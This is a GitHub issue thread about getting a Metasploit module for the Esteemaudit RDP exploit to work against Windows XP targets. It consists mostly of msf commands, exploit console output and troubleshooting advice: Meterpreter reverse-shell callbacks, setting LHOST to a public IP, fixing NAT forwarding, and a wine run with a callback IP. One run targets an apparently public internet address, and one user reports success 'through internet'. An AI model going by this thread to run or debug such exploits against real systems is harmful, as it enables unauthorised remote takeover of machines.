### ISSUE TITLE
Exploit completed, but no session was created

### ISSUE THREAD

**Issue by sabrex123** [BlackMathIT/Esteemaudit-Metasploit#5]
I need Help Here "Exploit completed, but no session was created"
Target: Win XP SP3 
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set RHOST 192.168.1.103

msf exploit(esteemaudit) > show options
Name                Current Setting          Required  Description
   ----                ---------------          --------  -----------
   ESTEEMAUDITPATH     /usr/share/esteemaudit/  yes       Path directory of Esteemaudit.exe
   RHOST               192.168.1.103            yes       The target address
   RPORT               3389                     yes       The RDP service port
   TARGETARCHITECTURE  x86                      yes       Target Architecture (Accepted: x86, x86 64-bit)
   WINEPATH            /root/.wine/drive_c/     yes       WINE drive_c path

Exploit target:
    Id  Name
    --  ----
     5   XPSP3         Windows XP SP3
msf exploit(esteemaudit) > exploit
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] 192.168.1.103:3389 - Generating Esteemaudit XML data
[*] 192.168.1.103:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.1.103:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.1.103:3389 - Launching Esteemaudit...
[-] 192.168.1.103:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

Help please..... Thanks

**Comment by BlackMathIT** [comment]
Hi @sabrex123  try to do this:
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
and paste the output here please

**Comment by Kimsahara** [comment]
Help me. 
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
InConfig: Esteemaudit-2.1.0.xml is not a valid value.

**Comment by BlackMathIT** [comment]
Do you have a Esteemaudit-2.1.0.xml file in /usr/share/esteemaudit/ ?

**Comment by Kimsahara** [comment]
No. I dont see Esteemaudit-2.1.0.xml file in "files" folder.

**Comment by BlackMathIT** [comment]
This is the reason why the module doesn't work, be sure that the user you use to launch the exploit have the right permission to write inside /usr/share/esteemaudit or the Esteemaudit-2.1.0.xml would never built and it contains the info needed to the exe file to work!

**Comment by sabrex123** [comment]
@BlackMathIT 
wine Esteemaudit-2.1.0.exe 
[*] Creating callback socket
	[+] Listening on 0.0.0.0:0
	[+] Callback socket creation complete
	[-] Unable to connect to RDP service - 0x80000007
[-] Exploit NOT successful :-(

Can you tell me where is the fault?

**Comment by anwareset** [comment]
Im using root user, buat why I still dont see "Esteemaudit-2.1.0.xml" in "/usr/share/esteemaudit"

**Comment by BlackMathIT** [comment]
@sabrex123 are you sure RDP port is enable on your target? it seems not...

@anwareset Esteemaudit-2.1.0.xml is automatically generated by MSF module with the right settings, which linux distro are you using? Try to do: `locate Esteemaudit-2.1.0.xml`

**Comment by nullbytebr** [comment]
Here appears this, What to do ?

Started reverse TCP handler on 192.168.139.128:4444 
[*] 200.55.133.90:3389 - Generating Esteemaudit XML data
[*] 200.55.133.90:3389 - Generating payload DLL for Esteemaudit
[*] 200.55.133.90:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 200.55.133.90:3389 - Launching Esteemaudit...
[+] 200.55.133.90:3389 - We are inside, waiting for meterpreter... 
[*] Exploit completed, but no session was created.

**Comment by fquiroga** [comment]
Same symptom, 

*] Started reverse TCP handler on 0.0.0.0:443 
[*] x.x.x.x:3389 - Generating Esteemaudit XML data
[*] x.x.x.x:3389 - Generating payload DLL for Esteemaudit
[*] x.x.x.x:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] x.x.x.x - Launching Esteemaudit...
[+] x.x.x.x - We are inside, waiting for meterpreter... 
[*] Exploit completed, but no session was created.

-The output of wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 
InConfig: Esteemaudit-2.1.0.xml is not a valid value.

-The file was generated by metasploit: 
ls /usr/share/esteemaudit/ | grep Estee
Esteemaudit-2.1.0.0.Skeleton.xml
Esteemaudit-2.1.0.exe
Esteemaudit-2.1.0.xml

-The Output of /usr/share/esteemaudit/null 
	[-] Callback timeout
	[-] Failed to receive a callback from target!
I'm testing over the internet, my ports are correctly forwarded to 443, 

Thanks.

**Comment by BlackMathIT** [comment]
@nullbytebr do this and paste here the output:
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe

@fquiroga There was an issue inside the esteemaudit.rb about LPORT redirect, now fixed, thanks for suggest, so download it again. Anyway if you want to testing it over internet, you have to set LHOST with your external IP address or the callback from the payload will never arrive...

**Comment by nullbytebr** [comment]
Appeared this 
"InConfig: Esteemaudit-2.1.0.xml is not a valid value."

**Comment by BlackMathIT** [comment]
@nullbytebr try to go inside /usr/share/esteemaudit and launch `wine Esteemaudit-2.1.0.exe`

**Comment by fquiroga** [comment]
@BlackMathIT Yes i'm under NAT, besides the port forward in my router, how do i configure my LPORT for the payload / exploit ? 
Thankyou

**Comment by BlackMathIT** [comment]
Configure LHOST with your public IP and if your NAT is forwarded properly ( on your internal host and port) it works. Same issue solved on #13

**Comment by fquiroga** [comment]
Thanks @BlackMathIT finally was a port forwarding issue, the exploit now is working correctly through internet.

**Comment by drax88** [comment]
HI @BlackMathIT ,when to exploit a target the session doesnt open,the only first correct thing that i see is that when I try doing 
wine esteemaudit-2.1.0.exe --CallbackIp 83.XXX.XX.XX --CallbackPort 4444
it finally says 
	[+] Uploading Second Stage 24576/25330 (97.02%)
	[+] Uploading Second Stage 24960/25330 (98.54%)
[*] Waiting for callback from second stage payload.
	[+] Connection received on listening socket
	[+] Connection accepted
	[+] Communicating with 83.50.124.19:4735
	[+] Authcode match : Received 0xabca9199
	[+] Callback successful!
[*] Exploit successful! :-)
<config xmlns="urn:trch" id="2a7d82545


But I dont know how to make it work on metasploit because the LHOST and LPORT parameters arent working
